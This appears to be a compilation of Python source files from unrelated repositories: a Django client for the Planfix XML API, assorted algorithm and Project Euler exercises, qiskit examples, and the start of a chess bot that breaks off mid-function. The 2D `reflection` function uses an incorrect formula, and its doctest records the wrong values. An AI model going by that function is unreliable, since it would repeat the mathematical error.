# }]
# try:
# response = ElementTree.fromstring(self.connect(**kwargs))
# return response.find('task').find("id").text
# except PlanfixError as e:
# return None
def task_get(self, id):
self.method = "task.get"
self.scheme = ['account',
'sid',
{'task': ['id']}
]
params = {'account': self.account,
'sid': self.sid,
'id': id}
try:
response = self.connect(**params)
return response
except PlanfixError as e:
return e
def task_get_field_value(self, id, custom_data_id):
task_get_res = self.task_get(id)
if isinstance(task_get_res, PlanfixError):
return task_get_res
root = ElementTree.fromstring(task_get_res)
custom_data = root.find('task').find('customData').findall('customValue')
for custom_value in custom_data:
if custom_data_id == custom_value.find('field').find('id').text:
return [int(value.text) for value in custom_value.findall('value')]
def task_update(self, *args, **kwargs):
self.method = "task.update"
self.scheme = ['account',
'sid',
{'task': ['id',
'silent',
'title',
'general',
'checkResult',
'description',
'importance',
'status',
{'owner': 'id'},
'statusSet',
'checkResult',
{'project': 'id'},
'startDateIsSet',
'startDate',
'startTimeIsSet',
'startTime',
'endDateIsSet',
'endDate',
'endTimeIsSet',
'endTime',
{'customData': 'customValue'}, # customValue = [id, value]
]}
]
try:
response = ElementTree.fromstring(self.connect(**kwargs))
return response.find('task').find("id").text
except PlanfixError as e:
return None
def task_update_v2(self, *args, **kwargs):
self.method = "task.update"
xml_values = {}
xml_values['@method'] = self.method
xml_values['account'] = self.account
xml_values['sid'] = self.sid
xml_values['silent'] = "1"
task = {}
task['id'] = kwargs.get('taskId')
task['customData'] = {}
task['customData']['customValue'] = []
for custom_data in kwargs.get('custom_data'):
task['customData']['customValue'].append({
'id': custom_data['id'],
'value': custom_data['value'],
})
xml_values['task'] = task
try:
return self.connect_v2(xml_values, **kwargs)
# response = ElementTree.fromstring(self.connect_v2(xml_values, **kwargs))
# return response.find('task').find("id").text
except PlanfixError as e:
return None
def handbook_get_group_list(self, *args, **kwargs):
self.method = 'handbook.getGroupList'
self.scheme = ['account', 'sid']
params = {'account': self.account,
'sid': self.sid}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('handbookGroups')
return [(group.find('id').text, group.find('name').text) for group in rt]
except PlanfixError as e:
return None
def handbook_get_list(self, *args, **kwargs):
self.method = 'handbook.getList'
self.scheme = ['account',
'sid',
{'group': 'id'}]
params = {'account': self.account,
'sid': self.sid}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('handbooks')
return [(group.find('id').text, group.find('name').text) for group in rt]
except PlanfixError as e:
return None
def handbook_get_records(self, handbook, *args, **kwargs):
self.method = 'handbook.getRecords'
self.scheme = ['account',
'sid',
{'handbook': 'id'},
'parentKey',
'pageCurrent',
'pageSize',
]
params = {'account': self.account,
'sid': self.sid,
'handbook': handbook,
}
if "parentKey" in kwargs:
params["parentKey"] = kwargs["parentKey"]
if "pageCurrent" in kwargs:
params["pageCurrent"] = kwargs["pageCurrent"]
if "pageSize" in kwargs:
params["pageSize"] = kwargs["pageSize"]
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('records')
result = dict()
for record in rt:
result[record.find('key').text] = \
record.find('customData').find('customValue').find('value').text
return result
except PlanfixError as e:
return None
def analitic_get_group_list(self):
self.method = 'analitic.getGroupList'
self.scheme = {'account', 'sid'}
params = {'account': self.account,
'sid': self.sid,}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('analiticGroups')
count_groups = rt.attrib['count']
total = rt.attrib['totalCount']
return [(item.find('id').text, item.find('name').text) for item in rt]
except PlanfixError as e:
return None
def analitic_get_list(self, groupId):
self.method = 'analitic.getList'
self.scheme = {'account', 'sid'}
params = {'account': self.account,
'analiticGroup': groupId,
'sid': self.sid,}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('analitics')
count_groups = rt.attrib['count']
total = rt.attrib['totalCount']
return [(item.find('id').text, item.find('name').text) for item in rt]
except PlanfixError as e:
return None
def action_add(self, *args, **kwargs):
self.method = 'action.add'
xml_values = {}
xml_values['@method'] = self.method
xml_values['account'] = self.account
xml_values['sid'] = self.sid
analitic = {}
analitic['id'] = kwargs.get('analiticId')
analitic['analiticData'] = {}
analitic['analiticData']['itemData'] = []
for a_data in kwargs.get('analitic_data'):
analitic['analiticData']['itemData'].append({
'fieldId': a_data['field_id'],
'value': a_data['value']
})
xml_values['action'] = {
'description': kwargs.get('description'),
# 'task': {'general': kwargs.get('taskGeneral')},
'task': {'id': kwargs.get('taskId')},
# {'contact': 'general'},
'taskNewStatus': kwargs.get('taskNewStatus'),
'notifiedList': {'user': kwargs.get('userIdList')},
# 'isHidden': kwargs.get('isHidden'),
# 'owner': {'id': kwargs.get('ownerId')},
# 'dateTime': kwargs.get('dateTime'),
'analitics': {'analitic': analitic}
}
try:
response = ElementTree.fromstring(self.connect_v2(xml_values, **kwargs))
print(response)
rt = response.find('action')
return rt.find('id').text
except PlanfixError as e:
return None
def action_get_list(self, _id):
self.method = 'action.getList'
xml_values = {}
xml_values['@method'] = self.method
xml_values['account'] = self.account
xml_values['sid'] = self.sid
xml_values['task'] = {'general': _id}
try:
            xml_string = self.connect_v2(xml_values)
            res = xmltodict.parse(xml_string)
            return res
except PlanfixError as e:
return None
def action_get(self, action_id):
self.method = 'action.get'
self.scheme = ['account',
{'action': 'id'},
'sid',
]
params = {'account': self.account,
'action': action_id,
'sid': self.sid,}
try:
xml_string = self.connect(**params)
res = xmltodict.parse(xml_string)
return res
except PlanfixError as e:
return None
```
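The methods above all follow the same pattern: set `self.method` plus either a `scheme` (for the legacy `connect`) or an `xml_values` dict (for `connect_v2`), then return the parsed response or `None` on a `PlanfixError`. A minimal usage sketch follows; the class name `PlanFix`, the constructor keywords and the host URL are placeholders for illustration, not confirmed by this file:
```python
# Hypothetical usage sketch -- class name, constructor keywords and host URL are
# placeholders, not a confirmed public API.
pf = PlanFix(
    account="myaccount",
    user="apiuser",
    password="secret",
    api_key="api-key",
    private_key="private-key",
    host="https://planfix.example/xml/",
)

groups = pf.handbook_get_group_list()      # [(id, name), ...] or None on error
handbooks = pf.handbook_get_list()         # [(id, name), ...] or None on error
if handbooks:
    records = pf.handbook_get_records(handbooks[0][0], pageSize=100)
    print(records)                         # {record_key: value, ...}
```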
#### File: django-planfix/planfix/classes.py
```python
import requests
from hashlib import md5
from xml.etree import ElementTree
from django.core.cache import cache
import xmltodict
class PlanfixError(Exception):
"""Exception raised for errors in the PLANFIX requests.
Attributes:
code -- planfix error code
message -- explanation of the error
"""
def __init__(self, code='', message=''):
self.code = code
self.message = message
class PlanFixBase(object):
CACHE_TIMELIFE = 20
request_templ = """<?xml version="1.0" encoding="UTF-8"?>
<request method="{}">
{}
<signature>{}</signature>
</request>
"""
method = ''
scheme = []
sign = ''
host = ""
api_key = ""
private_key = ""
project_id = ""
user = ""
password = ""
account = ""
level = 0
sid = None
debug = None
def __init__(self, *args, **kwargs):
self.sid = cache.get('planfix_sid')
attr_list = [i.__str__() for i in dir(self) if not i.startswith('__')]
if kwargs:
for item in kwargs.keys():
if item in attr_list:
self.__setattr__(item, kwargs[item])
if not self.sid:
self.auth()
def scheme_sort(self, a):
if isinstance(a, dict):
for i in a.keys():
# a[i] = sorted(a[i], key=self.scheme_sort)
return i
else:
return a
def get_sign(self, **kwargs):
params_list = self.method + \
self.string_by_schemefileds(
self.scheme, **kwargs) + self.private_key
self.sign = md5(params_list.encode('utf-8')).hexdigest()
def string_by_schemefileds(self, element, **kwargs):
result_list = []
element = list(element)
element.sort(key=self.scheme_sort)
for item in element:
if not isinstance(item, dict):
result_list.append(kwargs.get(item, ''))
else:
for key, val in item.items():
if not isinstance(val, list):
if val == 'id':
result_list.append(kwargs.get(key, ''))
elif val == 'customValue':
res = kwargs.get(key, '')
if not res == '' and isinstance(res, list):
result_list.append(str(res[0]) + str(res[1]))
else:
result_list.append(kwargs.get(val, ''))
else:
result_list.append(
self.string_by_schemefileds(val, **kwargs))
return "".join(result_list)
def create_xml_by_scheme(self, element, **kwargs):
result = ""
template = "<%s>%s</%s>"
custom_data_template = "<id>%s</id><value>%s</value>"
sub_result = ''
for item in element:
if not isinstance(item, dict):
if not kwargs.get(item, None) is None:
result += template % (item, kwargs.get(item, ''), item)
else:
for key, val in item.items():
if not isinstance(val, list):
kw_val = kwargs.get(key)
if not kw_val is None:
if val == 'id':
sub_result = template % (val, kw_val, val)
elif val == 'customValue':
if isinstance(kw_val, list):
sub_result = template % \
(val, (custom_data_template % (kw_val[0], kw_val[1])), val)
else:
sub_result = template % (val, kw_val, val)
else:
sub_result = self.create_xml_by_scheme(val, **kwargs)
result += template % (key, sub_result, key)
return result
def connect(self, **kwargs):
if not 'sid' in kwargs and self.sid:
kwargs['sid'] = self.sid
self.get_sign(**kwargs)
body = self.create_xml_by_scheme(self.scheme, **kwargs)
self.print_debug(body)
data = self.request_templ.format(
self.method, body, self.sign).encode('utf-8')
r = requests.post(self.host, data=data, auth=(self.api_key, ""))
content = r.content.decode()
self.print_debug(content)
if self.is_session_valid(content):
return content
elif self.method != 'auth.login':
tmp_params = dict(method=self.method, scheme=self.scheme)
self.auth(renew=True)
self.scheme, self.method = tmp_params['scheme'], tmp_params['method']
return self.connect(**kwargs)
def is_session_valid(self, res):
response = ElementTree.fromstring(res)
if response.attrib['status'] == 'ok':
return True
else:
if response.find('code').text == '0005':
return False
else:
raise PlanfixError(response.find('code').text, response.find('message').text)
def auth(self, renew=False):
if renew or self.sid == None:
self.method = 'auth.login'
self.scheme = ['account', 'login', 'password']
            params = {'account': self.account, 'login': self.user, 'password': self.password}
response = self.connect(**params)
if self.is_session_valid(response):
root = ElementTree.fromstring(response)
res = root.find('sid')
self.sid = res.text
cache.set('planfix_sid', self.sid, self.CACHE_TIMELIFE*60)
else:
return False
def print_debug(self, msg):
if hasattr(self.debug, '__call__'):
try:
self.debug(msg)
except TypeError as e:
print(e)
def connect_v2(self, xml_values, **kwargs):
if not 'sid' in xml_values and self.sid:
xml_values['sid'] = self.sid
xml_request = {}
xml_request['request'] = xml_values
body = xmltodict.unparse(xml_request)
data = body.encode('utf-8')
self.print_debug(data)
r = requests.post(self.host, data=data, auth=(self.api_key, ""))
content = r.content.decode()
self.print_debug(content)
if self.is_session_valid(content):
return content
elif self.method != 'auth.login':
self.auth(renew=True)
return self.connect_v2(xml_values, **kwargs)
```
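For reference, the signature that `get_sign()` attaches to every legacy request is just an MD5 digest of the method name, the scheme field values (ordered by `scheme_sort`) and the private key. A standalone sketch of the same calculation, using illustrative values:
```python
from hashlib import md5

# Standalone illustration of the signing rule implemented by get_sign():
# md5(method + <scheme field values in scheme_sort order> + private_key).
method = "auth.login"
ordered_values = "myaccount" + "apiuser" + "secret"   # ['account', 'login', 'password']
private_key = "private-key"
signature = md5((method + ordered_values + private_key).encode("utf-8")).hexdigest()
print(signature)
```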
|
{
"source": "jenia90/Python",
"score": 4
}
|
#### File: Python/backtracking/minimax.py
```python
from __future__ import annotations
import math
""" Minimax helps to achieve maximum score in a game by checking all possible moves
depth is current depth in game tree.
nodeIndex is index of current node in scores[].
if move is of maximizer return true else false
leaves of game tree is stored in scores[]
height is maximum height of Game tree
"""
def minimax(
depth: int, node_index: int, is_max: bool, scores: list[int], height: float
) -> int:
"""
>>> import math
>>> scores = [90, 23, 6, 33, 21, 65, 123, 34423]
>>> height = math.log(len(scores), 2)
>>> minimax(0, 0, True, scores, height)
65
>>> minimax(-1, 0, True, scores, height)
Traceback (most recent call last):
...
ValueError: Depth cannot be less than 0
>>> minimax(0, 0, True, [], 2)
Traceback (most recent call last):
...
ValueError: Scores cannot be empty
>>> scores = [3, 5, 2, 9, 12, 5, 23, 23]
>>> height = math.log(len(scores), 2)
>>> minimax(0, 0, True, scores, height)
12
>>> minimax('1', 2, True, [], 2 )
Traceback (most recent call last):
...
TypeError: '<' not supported between instances of 'str' and 'int'
"""
if depth < 0:
raise ValueError("Depth cannot be less than 0")
if len(scores) == 0:
raise ValueError("Scores cannot be empty")
if depth == height:
return scores[node_index]
if is_max:
return max(
minimax(depth + 1, node_index * 2, False, scores, height),
minimax(depth + 1, node_index * 2 + 1, False, scores, height),
)
return min(
minimax(depth + 1, node_index * 2, True, scores, height),
minimax(depth + 1, node_index * 2 + 1, True, scores, height),
)
def main():
scores = [90, 23, 6, 33, 21, 65, 123, 34423]
height = math.log(len(scores), 2)
print("Optimal value : ", end="")
print(minimax(0, 0, True, scores, height))
if __name__ == "__main__":
import doctest
doctest.testmod()
main()
```
#### File: Python/bit_manipulation/binary_or_operator.py
```python
def binary_or(a: int, b: int):
"""
Take in 2 integers, convert them to binary, and return a binary number that is the
result of a binary or operation on the integers provided.
>>> binary_or(25, 32)
'0b111001'
>>> binary_or(37, 50)
'0b110111'
>>> binary_or(21, 30)
'0b11111'
>>> binary_or(58, 73)
'0b1111011'
>>> binary_or(0, 255)
'0b11111111'
>>> binary_or(0, 256)
'0b100000000'
>>> binary_or(0, -1)
Traceback (most recent call last):
...
ValueError: the value of both input must be positive
>>> binary_or(0, 1.1)
Traceback (most recent call last):
...
TypeError: 'float' object cannot be interpreted as an integer
>>> binary_or("0", "1")
Traceback (most recent call last):
...
TypeError: '<' not supported between instances of 'str' and 'int'
"""
if a < 0 or b < 0:
raise ValueError("the value of both input must be positive")
a_binary = str(bin(a))[2:] # remove the leading "0b"
b_binary = str(bin(b))[2:]
max_len = max(len(a_binary), len(b_binary))
return "0b" + "".join(
str(int("1" in (char_a, char_b)))
for char_a, char_b in zip(a_binary.zfill(max_len), b_binary.zfill(max_len))
)
if __name__ == "__main__":
import doctest
doctest.testmod()
```
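The result can be cross-checked against Python's built-in bitwise OR, since `bin(a | b)` produces the same `'0b...'` string for non-negative inputs; a quick sanity check (not part of the module above):
```python
# Cross-check binary_or() against the built-in | operator.
for a, b in [(25, 32), (37, 50), (21, 30), (0, 255), (58, 73)]:
    assert binary_or(a, b) == bin(a | b), (a, b)
print("binary_or matches bin(a | b) on the sample inputs")
```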
#### File: Python/conversions/hexadecimal_to_decimal.py
```python
hex_table = {hex(i)[2:]: i for i in range(16)}  # Use [2:] to strip off the leading '0x'
def hex_to_decimal(hex_string: str) -> int:
"""
Convert a hexadecimal value to its decimal equivalent
#https://www.programiz.com/python-programming/methods/built-in/hex
>>> hex_to_decimal("a")
10
>>> hex_to_decimal("12f")
303
>>> hex_to_decimal(" 12f ")
303
>>> hex_to_decimal("FfFf")
65535
>>> hex_to_decimal("-Ff")
-255
>>> hex_to_decimal("F-f")
Traceback (most recent call last):
...
ValueError: Non-hexadecimal value was passed to the function
>>> hex_to_decimal("")
Traceback (most recent call last):
...
ValueError: Empty string was passed to the function
>>> hex_to_decimal("12m")
Traceback (most recent call last):
...
ValueError: Non-hexadecimal value was passed to the function
"""
hex_string = hex_string.strip().lower()
if not hex_string:
raise ValueError("Empty string was passed to the function")
is_negative = hex_string[0] == "-"
if is_negative:
hex_string = hex_string[1:]
if not all(char in hex_table for char in hex_string):
raise ValueError("Non-hexadecimal value was passed to the function")
decimal_number = 0
for char in hex_string:
decimal_number = 16 * decimal_number + hex_table[char]
return -decimal_number if is_negative else decimal_number
if __name__ == "__main__":
from doctest import testmod
testmod()
```
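The same conversion is available as `int(value, 16)` in the standard library; a quick cross-check on the docstring examples (note that `int()` additionally accepts an optional `0x` prefix, which this function does not):
```python
# Cross-check hex_to_decimal() against the built-in int(value, 16).
for value in ["a", "12f", " 12f ", "FfFf", "-Ff"]:
    assert hex_to_decimal(value) == int(value, 16), value
print("hex_to_decimal matches int(value, 16) on the sample inputs")
```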
#### File: data_structures/linked_list/has_loop.py
```python
from typing import Any
class ContainsLoopError(Exception):
pass
class Node:
def __init__(self, data: Any) -> None:
self.data = data
self.next_node = None
def __iter__(self):
node = self
visited = []
while node:
if node in visited:
raise ContainsLoopError
visited.append(node)
yield node.data
node = node.next_node
@property
def has_loop(self) -> bool:
"""
A loop is when the exact same Node appears more than once in a linked list.
>>> root_node = Node(1)
>>> root_node.next_node = Node(2)
>>> root_node.next_node.next_node = Node(3)
>>> root_node.next_node.next_node.next_node = Node(4)
>>> root_node.has_loop
False
>>> root_node.next_node.next_node.next_node = root_node.next_node
>>> root_node.has_loop
True
"""
try:
list(self)
return False
except ContainsLoopError:
return True
if __name__ == "__main__":
root_node = Node(1)
root_node.next_node = Node(2)
root_node.next_node.next_node = Node(3)
root_node.next_node.next_node.next_node = Node(4)
print(root_node.has_loop) # False
root_node.next_node.next_node.next_node = root_node.next_node
print(root_node.has_loop) # True
root_node = Node(5)
root_node.next_node = Node(6)
root_node.next_node.next_node = Node(5)
root_node.next_node.next_node.next_node = Node(6)
print(root_node.has_loop) # False
root_node = Node(1)
print(root_node.has_loop) # False
```
#### File: linear_algebra/src/transformations_2d.py
```python
from __future__ import annotations
from math import cos, sin
def scaling(scaling_factor: float) -> list[list[float]]:
"""
>>> scaling(5)
[[5.0, 0.0], [0.0, 5.0]]
"""
scaling_factor = float(scaling_factor)
return [[scaling_factor * int(x == y) for x in range(2)] for y in range(2)]
def rotation(angle: float) -> list[list[float]]:
"""
>>> rotation(45) # doctest: +NORMALIZE_WHITESPACE
[[0.5253219888177297, -0.8509035245341184],
[0.8509035245341184, 0.5253219888177297]]
"""
c, s = cos(angle), sin(angle)
return [[c, -s], [s, c]]
def projection(angle: float) -> list[list[float]]:
"""
>>> projection(45) # doctest: +NORMALIZE_WHITESPACE
[[0.27596319193541496, 0.446998331800279],
[0.446998331800279, 0.7240368080645851]]
"""
c, s = cos(angle), sin(angle)
cs = c * s
return [[c * c, cs], [cs, s * s]]
def reflection(angle: float) -> list[list[float]]:
"""
>>> reflection(45) # doctest: +NORMALIZE_WHITESPACE
[[0.05064397763545947, 0.893996663600558],
[0.893996663600558, 0.7018070490682369]]
"""
c, s = cos(angle), sin(angle)
cs = c * s
return [[2 * c - 1, 2 * cs], [2 * cs, 2 * s - 1]]
print(f" {scaling(5) = }")
print(f" {rotation(45) = }")
print(f"{projection(45) = }")
print(f"{reflection(45) = }")
```
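Note that the angles are passed straight to `math.cos`/`math.sin`, so they are interpreted as radians; the doctests above therefore describe a rotation by 45 radians, not 45 degrees. For a 45-degree rotation, convert explicitly:
```python
import math

# rotation() expects radians; convert degrees explicitly for a 45-degree turn.
r45 = rotation(math.radians(45))
print(r45)  # approximately [[0.7071, -0.7071], [0.7071, 0.7071]]
```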
#### File: Python/other/markov_chain.py
```python
from __future__ import annotations
from collections import Counter
from random import random
class MarkovChainGraphUndirectedUnweighted:
"""
Undirected Unweighted Graph for running Markov Chain Algorithm
"""
def __init__(self):
self.connections = {}
def add_node(self, node: str) -> None:
self.connections[node] = {}
def add_transition_probability(
self, node1: str, node2: str, probability: float
) -> None:
if node1 not in self.connections:
self.add_node(node1)
if node2 not in self.connections:
self.add_node(node2)
self.connections[node1][node2] = probability
def get_nodes(self) -> list[str]:
return list(self.connections)
def transition(self, node: str) -> str:
current_probability = 0
random_value = random()
for dest in self.connections[node]:
current_probability += self.connections[node][dest]
if current_probability > random_value:
return dest
def get_transitions(
start: str, transitions: list[tuple[str, str, float]], steps: int
) -> dict[str, int]:
"""
Running Markov Chain algorithm and calculating the number of times each node is
visited
>>> transitions = [
... ('a', 'a', 0.9),
... ('a', 'b', 0.075),
... ('a', 'c', 0.025),
... ('b', 'a', 0.15),
... ('b', 'b', 0.8),
... ('b', 'c', 0.05),
... ('c', 'a', 0.25),
... ('c', 'b', 0.25),
... ('c', 'c', 0.5)
... ]
>>> result = get_transitions('a', transitions, 5000)
>>> result['a'] > result['b'] > result['c']
True
"""
graph = MarkovChainGraphUndirectedUnweighted()
for node1, node2, probability in transitions:
graph.add_transition_probability(node1, node2, probability)
visited = Counter(graph.get_nodes())
node = start
for _ in range(steps):
node = graph.transition(node)
visited[node] += 1
return visited
if __name__ == "__main__":
import doctest
doctest.testmod()
```
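Dividing the visit counts by the number of steps turns the result of `get_transitions` into an empirical estimate of the chain's stationary distribution. A short sketch using the same transition table as the doctest (the exact numbers vary from run to run):
```python
# Empirical stationary distribution from the visit counts.
transitions = [
    ("a", "a", 0.9), ("a", "b", 0.075), ("a", "c", 0.025),
    ("b", "a", 0.15), ("b", "b", 0.8), ("b", "c", 0.05),
    ("c", "a", 0.25), ("c", "b", 0.25), ("c", "c", 0.5),
]
steps = 10000
counts = get_transitions("a", transitions, steps)
distribution = {node: count / steps for node, count in counts.items()}
print(distribution)  # roughly {'a': 0.62, 'b': 0.31, 'c': 0.06}
```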
#### File: project_euler/problem_008/sol3.py
```python
import sys
N = """73167176531330624919225119674426574742355349194934\
96983520312774506326239578318016984801869478851843\
85861560789112949495459501737958331952853208805511\
12540698747158523863050715693290963295227443043557\
66896648950445244523161731856403098711121722383113\
62229893423380308135336276614282806444486645238749\
30358907296290491560440772390713810515859307960866\
70172427121883998797908792274921901699720888093776\
65727333001053367881220235421809751254540594752243\
52584907711670556013604839586446706324415722155397\
53697817977846174064955149290862569321978468622482\
83972241375657056057490261407972968652414535100474\
82166370484403199890008895243450658541227588666881\
16427171479924442928230863465674813919123162824586\
17866458359124566529476545682848912883142607690042\
24219022671055626321111109370544217506941658960408\
07198403850962455444362981230987879927244284909188\
84580156166097919133875499200524063689912560717606\
05886116467109405077541002256983155200055935729725\
71636269561882670428252483600823257530420752963450"""
def str_eval(s: str) -> int:
"""Returns product of digits in given string n
>>> str_eval("987654321")
362880
>>> str_eval("22222222")
256
"""
product = 1
for digit in s:
product *= int(digit)
return product
def solution(n: str = N) -> int:
"""Find the thirteen adjacent digits in the 1000-digit number n that have
the greatest product and returns it.
>>> solution(N)
23514624000
"""
largest_product = -sys.maxsize - 1
substr = n[:13]
cur_index = 13
while cur_index < len(n) - 13:
if int(n[cur_index]) >= int(substr[0]):
substr = substr[1:] + n[cur_index]
cur_index += 1
else:
largest_product = max(largest_product, str_eval(substr))
substr = n[cur_index : cur_index + 13]
cur_index += 13
return largest_product
if __name__ == "__main__":
print(solution(N))
```
#### File: project_euler/problem_020/sol2.py
```python
from math import factorial
def solution(num: int = 100) -> int:
"""Returns the sum of the digits in the factorial of num
>>> solution(100)
648
>>> solution(50)
216
>>> solution(10)
27
>>> solution(5)
3
>>> solution(3)
6
>>> solution(2)
2
>>> solution(1)
1
"""
return sum([int(x) for x in str(factorial(num))])
if __name__ == "__main__":
print(solution(int(input("Enter the Number: ").strip())))
```
#### File: project_euler/problem_025/sol2.py
```python
def fibonacci_generator() -> int:
"""
A generator that produces numbers in the Fibonacci sequence
>>> generator = fibonacci_generator()
>>> next(generator)
1
>>> next(generator)
2
>>> next(generator)
3
>>> next(generator)
5
>>> next(generator)
8
"""
a, b = 0, 1
while True:
a, b = b, a + b
yield b
def solution(n: int = 1000) -> int:
"""Returns the index of the first term in the Fibonacci sequence to contain
n digits.
>>> solution(1000)
4782
>>> solution(100)
476
>>> solution(50)
237
>>> solution(3)
12
"""
answer = 1
gen = fibonacci_generator()
while len(str(next(gen))) < n:
answer += 1
return answer + 1
if __name__ == "__main__":
print(solution(int(str(input()).strip())))
```
#### File: project_euler/problem_057/sol1.py
```python
def solution(n: int = 1000) -> int:
"""
returns number of fractions containing a numerator with more digits than
the denominator in the first n expansions.
>>> solution(14)
2
>>> solution(100)
15
>>> solution(10000)
1508
"""
prev_numerator, prev_denominator = 1, 1
result = []
for i in range(1, n + 1):
numerator = prev_numerator + 2 * prev_denominator
denominator = prev_numerator + prev_denominator
if len(str(numerator)) > len(str(denominator)):
result.append(i)
prev_numerator = numerator
prev_denominator = denominator
return len(result)
if __name__ == "__main__":
print(f"{solution() = }")
```
#### File: project_euler/problem_120/sol1.py
```python
def solution(n: int = 1000) -> int:
"""
Returns ∑ r_max for 3 <= a <= n as explained above
>>> solution(10)
300
>>> solution(100)
330750
>>> solution(1000)
333082500
"""
return sum(2 * a * ((a - 1) // 2) for a in range(3, n + 1))
if __name__ == "__main__":
print(solution())
```
#### File: Python/quantum/not_gate.py
```python
import qiskit as q
def single_qubit_measure(qubits: int, classical_bits: int) -> q.result.counts.Counts:
"""
>>> single_qubit_measure(2, 2)
{'11': 1000}
>>> single_qubit_measure(4, 4)
{'0011': 1000}
"""
# Use Aer's qasm_simulator
simulator = q.Aer.get_backend("qasm_simulator")
# Create a Quantum Circuit acting on the q register
circuit = q.QuantumCircuit(qubits, classical_bits)
# Apply X (NOT) Gate to Qubits 0 & 1
circuit.x(0)
circuit.x(1)
# Map the quantum measurement to the classical bits
circuit.measure([0, 1], [0, 1])
# Execute the circuit on the qasm simulator
job = q.execute(circuit, simulator, shots=1000)
# Return the histogram data of the results of the experiment.
return job.result().get_counts(circuit)
if __name__ == "__main__":
counts = single_qubit_measure(2, 2)
print(f"Total count for various states are: {counts}")
```
#### File: Python/quantum/quantum_entanglement.py
```python
import qiskit
def quantum_entanglement(qubits: int = 2) -> qiskit.result.counts.Counts:
"""
# >>> quantum_entanglement(2)
# {'00': 500, '11': 500}
# ┌───┐ ┌─┐
# q_0: ┤ H ├──■──┤M├───
# └───┘┌─┴─┐└╥┘┌─┐
# q_1: ─────┤ X ├─╫─┤M├
# └───┘ ║ └╥┘
# c: 2/═══════════╩══╩═
# 0 1
Args:
        qubits (int): number of qubits to use. Defaults to 2
Returns:
qiskit.result.counts.Counts: mapping of states to its counts
"""
classical_bits = qubits
# Using Aer's qasm_simulator
simulator = qiskit.Aer.get_backend("qasm_simulator")
# Creating a Quantum Circuit acting on the q register
circuit = qiskit.QuantumCircuit(qubits, classical_bits)
# Adding a H gate on qubit 0 (now q0 in superposition)
circuit.h(0)
for i in range(1, qubits):
# Adding CX (CNOT) gate
circuit.cx(i - 1, i)
# Mapping the quantum measurement to the classical bits
circuit.measure(list(range(qubits)), list(range(classical_bits)))
# Now measuring any one qubit would affect other qubits to collapse
# their super position and have same state as the measured one.
# Executing the circuit on the qasm simulator
job = qiskit.execute(circuit, simulator, shots=1000)
return job.result().get_counts(circuit)
if __name__ == "__main__":
print(f"Total count for various states are: {quantum_entanglement(3)}")
```
#### File: Python/sorts/recursive_bubble_sort.py
```python
def bubble_sort(list_data: list, length: int = 0) -> list:
"""
    It is similar to bubble sort, but implemented recursively.
:param list_data: mutable ordered sequence of elements
:param length: length of list data
:return: the same list in ascending order
>>> bubble_sort([0, 5, 2, 3, 2], 5)
[0, 2, 2, 3, 5]
>>> bubble_sort([], 0)
[]
>>> bubble_sort([-2, -45, -5], 3)
[-45, -5, -2]
>>> bubble_sort([-23, 0, 6, -4, 34], 5)
[-23, -4, 0, 6, 34]
>>> bubble_sort([-23, 0, 6, -4, 34], 5) == sorted([-23, 0, 6, -4, 34])
True
>>> bubble_sort(['z','a','y','b','x','c'], 6)
['a', 'b', 'c', 'x', 'y', 'z']
>>> bubble_sort([1.1, 3.3, 5.5, 7.7, 2.2, 4.4, 6.6])
[1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7]
"""
length = length or len(list_data)
swapped = False
for i in range(length - 1):
if list_data[i] > list_data[i + 1]:
list_data[i], list_data[i + 1] = list_data[i + 1], list_data[i]
swapped = True
return list_data if not swapped else bubble_sort(list_data, length - 1)
if __name__ == "__main__":
import doctest
doctest.testmod()
```
#### File: Python/strings/swap_case.py
```python
import re
# This compiled pattern matches any character that is NOT a letter
# ('a'-'z' or 'A'-'Z'); such characters are copied through unchanged below.
regexp = re.compile("[^a-zA-Z]+")
def swap_case(sentence):
"""
This function will convert all lowercase letters to uppercase letters
and vice versa.
>>> swap_case('Algorithm.Python@89')
'aLGORITHM.pYTHON@89'
"""
new_string = ""
for char in sentence:
if char.isupper():
new_string += char.lower()
if char.islower():
new_string += char.upper()
if regexp.search(char):
new_string += char
return new_string
if __name__ == "__main__":
print(swap_case(input("Please input sentence:")))
```
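The standard library already offers this behavior as `str.swapcase()`; a quick comparison against the hand-rolled version (both leave digits and punctuation untouched):
```python
# Compare the hand-rolled swap_case() with the built-in str.swapcase().
sample = "Algorithm.Python@89"
assert swap_case(sample) == sample.swapcase() == "aLGORITHM.pYTHON@89"
```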
|
{
"source": "JeniaD/Chess-Bot",
"score": 3
}
|
#### File: JeniaD/Chess-Bot/bot.py
```python
from textwrap import wrap
import random
import chess
import copy
def CheckForResult(originalBoard, deep, root = False, side = "White", makeCopy = True):
if makeCopy: board = copy.deepcopy(originalBoard)
else: board = originalBoard
if deep <= 0:
#Check statistics
total = 0
if board.outcome() != None:
res = board.outcome().result()
if res == "1-0": return 700
elif res == "0-1": return -700
pieceMap = board.piece_map()
for piece in pieceMap:
if pieceMap[piece] == chess.Piece.from_symbol('P'): total += 1
elif pieceMap[piece] == chess.Piece.from_symbol('p'): total -= 1
elif pieceMap[piece] == chess.Piece.from_symbol('N'): total += 3
elif pieceMap[piece] == chess.Piece.from_symbol('B'): total += 3
elif pieceMap[piece] == chess.Piece.from_symbol('n'): total -= 3
elif pieceMap[piece] == chess.Piece.from_symbol('b'): total -= 3
elif pieceMap[piece] == chess.Piece.from_symbol('R'): total += 5
elif pieceMap[piece] == chess.Piece.from_symbol('r'): total -= 5
elif pieceMap[piece] == chess.Piece.from_symbol('Q'): total += 9
elif pieceMap[piece] == chess.Piece.from_symbol('q'): total -= 9
return total
possibleSituations = {}
for possibleMove in board.legal_moves:
newBoard = copy.deepcopy(board)
newBoard.push((possibleMove))
possibleSituations[possibleMove] = CheckForResult(newBoard, deep-1, side=side, makeCopy=False)
bestMove = None
bestResult = -1000 if side == "White" else 1000
    # Needs to filter the best move from the possibilities
if root:
# Needs to give best move.
for possibleMove in possibleSituations:
if side == "White" and possibleSituations[possibleMove] > bestResult:
bestResult = possibleSituations[possibleMove]
bestMove = possibleMove
elif side == "Black" and possibleSituations[possibleMove] < bestResult:
bestResult = possibleSituations[possibleMove]
bestMove = possibleMove
elif possibleSituations[possibleMove] == bestResult:
if random.getrandbits(1):
bestResult = possibleSituations[possibleMove]
bestMove = possibleMove
... # Same outcome
return bestMove, bestResult
else:
